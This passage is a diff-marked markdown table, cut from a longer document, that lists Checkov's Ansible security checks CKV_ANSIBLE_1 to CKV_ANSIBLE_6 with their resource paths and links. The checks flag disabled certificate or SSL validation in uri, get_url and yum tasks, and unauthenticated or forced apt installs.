-|   49 | CKV_ANSIBLE_1            | resource                         | [].block[].block[].block[?"ansible.builtin.uri" != null][]                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   50 | CKV_ANSIBLE_1            | resource                         | [].block[].block[].block[?"uri" != null][]                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   51 | CKV_ANSIBLE_1            | resource                         | [].tasks[?"ansible.builtin.uri" != null][]                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   52 | CKV_ANSIBLE_1            | resource                         | [].tasks[?"uri" != null][]                                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   53 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[?"ansible.builtin.uri" != null][]                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   54 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[?"uri" != null][]                                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   55 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[].block[?"ansible.builtin.uri" != null][]                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   56 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[].block[?"uri" != null][]                                                       | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   57 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.uri" != null][]                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   58 | CKV_ANSIBLE_1            | resource                         | [].tasks[].block[].block[].block[?"uri" != null][]                                               | Ensure that certificate validation isn't disabled with uri                                                                                                                                               | Ansible                 | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py)                                                                                         |
-|   59 | CKV_ANSIBLE_2            | resource                         | [?"ansible.builtin.get_url" != null][]                                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   60 | CKV_ANSIBLE_2            | resource                         | [?"get_url" != null][]                                                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   61 | CKV_ANSIBLE_2            | resource                         | [].block[?"ansible.builtin.get_url" != null][]                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   62 | CKV_ANSIBLE_2            | resource                         | [].block[?"get_url" != null][]                                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   63 | CKV_ANSIBLE_2            | resource                         | [].block[].block[?"ansible.builtin.get_url" != null][]                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   64 | CKV_ANSIBLE_2            | resource                         | [].block[].block[?"get_url" != null][]                                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   65 | CKV_ANSIBLE_2            | resource                         | [].block[].block[].block[?"ansible.builtin.get_url" != null][]                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   66 | CKV_ANSIBLE_2            | resource                         | [].block[].block[].block[?"get_url" != null][]                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   67 | CKV_ANSIBLE_2            | resource                         | [].tasks[?"ansible.builtin.get_url" != null][]                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   68 | CKV_ANSIBLE_2            | resource                         | [].tasks[?"get_url" != null][]                                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   69 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[?"ansible.builtin.get_url" != null][]                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   70 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[?"get_url" != null][]                                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   71 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[].block[?"ansible.builtin.get_url" != null][]                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   72 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[].block[?"get_url" != null][]                                                   | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   73 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.get_url" != null][]                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   74 | CKV_ANSIBLE_2            | resource                         | [].tasks[].block[].block[].block[?"get_url" != null][]                                           | Ensure that certificate validation isn't disabled with get_url                                                                                                                                           | Ansible                 | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py)                                                                                   |
-|   75 | CKV_ANSIBLE_3            | resource                         | [?"ansible.builtin.yum" != null][]                                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   76 | CKV_ANSIBLE_3            | resource                         | [?"yum" != null][]                                                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   77 | CKV_ANSIBLE_3            | resource                         | [].block[?"ansible.builtin.yum" != null][]                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   78 | CKV_ANSIBLE_3            | resource                         | [].block[?"yum" != null][]                                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   79 | CKV_ANSIBLE_3            | resource                         | [].block[].block[?"ansible.builtin.yum" != null][]                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   80 | CKV_ANSIBLE_3            | resource                         | [].block[].block[?"yum" != null][]                                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   81 | CKV_ANSIBLE_3            | resource                         | [].block[].block[].block[?"ansible.builtin.yum" != null][]                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   82 | CKV_ANSIBLE_3            | resource                         | [].block[].block[].block[?"yum" != null][]                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   83 | CKV_ANSIBLE_3            | resource                         | [].tasks[?"ansible.builtin.yum" != null][]                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   84 | CKV_ANSIBLE_3            | resource                         | [].tasks[?"yum" != null][]                                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   85 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[?"ansible.builtin.yum" != null][]                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   86 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[?"yum" != null][]                                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   87 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[].block[?"ansible.builtin.yum" != null][]                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   88 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[].block[?"yum" != null][]                                                       | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   89 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][]                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   90 | CKV_ANSIBLE_3            | resource                         | [].tasks[].block[].block[].block[?"yum" != null][]                                               | Ensure that certificate validation isn't disabled with yum                                                                                                                                               | Ansible                 | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py)                                                                                         |
-|   91 | CKV_ANSIBLE_4            | resource                         | [?"ansible.builtin.yum" != null][]                                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|   92 | CKV_ANSIBLE_4            | resource                         | [?"yum" != null][]                                                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|   93 | CKV_ANSIBLE_4            | resource                         | [].block[?"ansible.builtin.yum" != null][]                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|   94 | CKV_ANSIBLE_4            | resource                         | [].block[?"yum" != null][]                                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|   95 | CKV_ANSIBLE_4            | resource                         | [].block[].block[?"ansible.builtin.yum" != null][]                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|   96 | CKV_ANSIBLE_4            | resource                         | [].block[].block[?"yum" != null][]                                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|   97 | CKV_ANSIBLE_4            | resource                         | [].block[].block[].block[?"ansible.builtin.yum" != null][]                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|   98 | CKV_ANSIBLE_4            | resource                         | [].block[].block[].block[?"yum" != null][]                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|   99 | CKV_ANSIBLE_4            | resource                         | [].tasks[?"ansible.builtin.yum" != null][]                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|  100 | CKV_ANSIBLE_4            | resource                         | [].tasks[?"yum" != null][]                                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|  101 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[?"ansible.builtin.yum" != null][]                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|  102 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[?"yum" != null][]                                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|  103 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[].block[?"ansible.builtin.yum" != null][]                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|  104 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[].block[?"yum" != null][]                                                       | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|  105 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][]                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|  106 | CKV_ANSIBLE_4            | resource                         | [].tasks[].block[].block[].block[?"yum" != null][]                                               | Ensure that SSL validation isn't disabled with yum                                                                                                                                                       | Ansible                 | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py)                                                                                                 |
-|  107 | CKV_ANSIBLE_5            | resource                         | [?"ansible.builtin.apt" != null][]                                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  108 | CKV_ANSIBLE_5            | resource                         | [?"apt" != null][]                                                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  109 | CKV_ANSIBLE_5            | resource                         | [].block[?"ansible.builtin.apt" != null][]                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  110 | CKV_ANSIBLE_5            | resource                         | [].block[?"apt" != null][]                                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  111 | CKV_ANSIBLE_5            | resource                         | [].block[].block[?"ansible.builtin.apt" != null][]                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  112 | CKV_ANSIBLE_5            | resource                         | [].block[].block[?"apt" != null][]                                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  113 | CKV_ANSIBLE_5            | resource                         | [].block[].block[].block[?"ansible.builtin.apt" != null][]                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  114 | CKV_ANSIBLE_5            | resource                         | [].block[].block[].block[?"apt" != null][]                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  115 | CKV_ANSIBLE_5            | resource                         | [].tasks[?"ansible.builtin.apt" != null][]                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  116 | CKV_ANSIBLE_5            | resource                         | [].tasks[?"apt" != null][]                                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  117 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[?"ansible.builtin.apt" != null][]                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  118 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[?"apt" != null][]                                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  119 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[].block[?"ansible.builtin.apt" != null][]                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  120 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[].block[?"apt" != null][]                                                       | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  121 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][]                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  122 | CKV_ANSIBLE_5            | resource                         | [].tasks[].block[].block[].block[?"apt" != null][]                                               | Ensure that packages with untrusted or missing signatures are not used                                                                                                                                   | Ansible                 | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py)                                                                           |
-|  123 | CKV_ANSIBLE_6            | resource                         | [?"ansible.builtin.apt" != null][]                                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  124 | CKV_ANSIBLE_6            | resource                         | [?"apt" != null][]                                                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  125 | CKV_ANSIBLE_6            | resource                         | [].block[?"ansible.builtin.apt" != null][]                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  126 | CKV_ANSIBLE_6            | resource                         | [].block[?"apt" != null][]                                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  127 | CKV_ANSIBLE_6            | resource                         | [].block[].block[?"ansible.builtin.apt" != null][]                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  128 | CKV_ANSIBLE_6            | resource                         | [].block[].block[?"apt" != null][]                                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  129 | CKV_ANSIBLE_6            | resource                         | [].block[].block[].block[?"ansible.builtin.apt" != null][]                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  130 | CKV_ANSIBLE_6            | resource                         | [].block[].block[].block[?"apt" != null][]                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  131 | CKV_ANSIBLE_6            | resource                         | [].tasks[?"ansible.builtin.apt" != null][]                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  132 | CKV_ANSIBLE_6            | resource                         | [].tasks[?"apt" != null][]                                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  133 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[?"ansible.builtin.apt" != null][]                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  134 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[?"apt" != null][]                                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  135 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[].block[?"ansible.builtin.apt" != null][]                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  136 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[].block[?"apt" != null][]                                                       | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  137 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][]                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
-|  138 | CKV_ANSIBLE_6            | resource                         | [].tasks[].block[].block[].block[?"apt" != null][]                                               | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                       | Ansible                 | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py)                                                                                                         |
